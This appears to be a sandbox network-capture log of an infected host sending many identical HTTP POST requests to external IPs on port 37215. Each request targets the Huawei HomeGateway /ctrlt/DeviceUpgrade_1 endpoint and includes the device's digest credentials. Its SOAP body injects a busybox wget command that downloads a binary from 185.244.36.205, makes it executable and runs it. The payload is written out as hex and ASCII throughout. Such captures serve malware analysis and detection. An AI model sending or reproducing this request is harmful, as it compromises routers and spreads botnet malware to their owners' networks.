                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2109192.168.2.1546752138.90.44.1237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104707956 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2110192.168.2.155137894.123.200.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104744911 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2111192.168.2.155234841.72.39.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104749918 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2112192.168.2.154280441.207.69.5337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104753017 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2113192.168.2.1553338222.2.140.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104800940 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2114192.168.2.1559346102.51.33.6537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104804039 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2115192.168.2.1545106156.36.224.11437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104806900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2116192.168.2.155205213.36.8.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104806900 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2117192.168.2.1548160122.49.217.18037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104835987 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2118192.168.2.155278231.97.27.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.104839087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
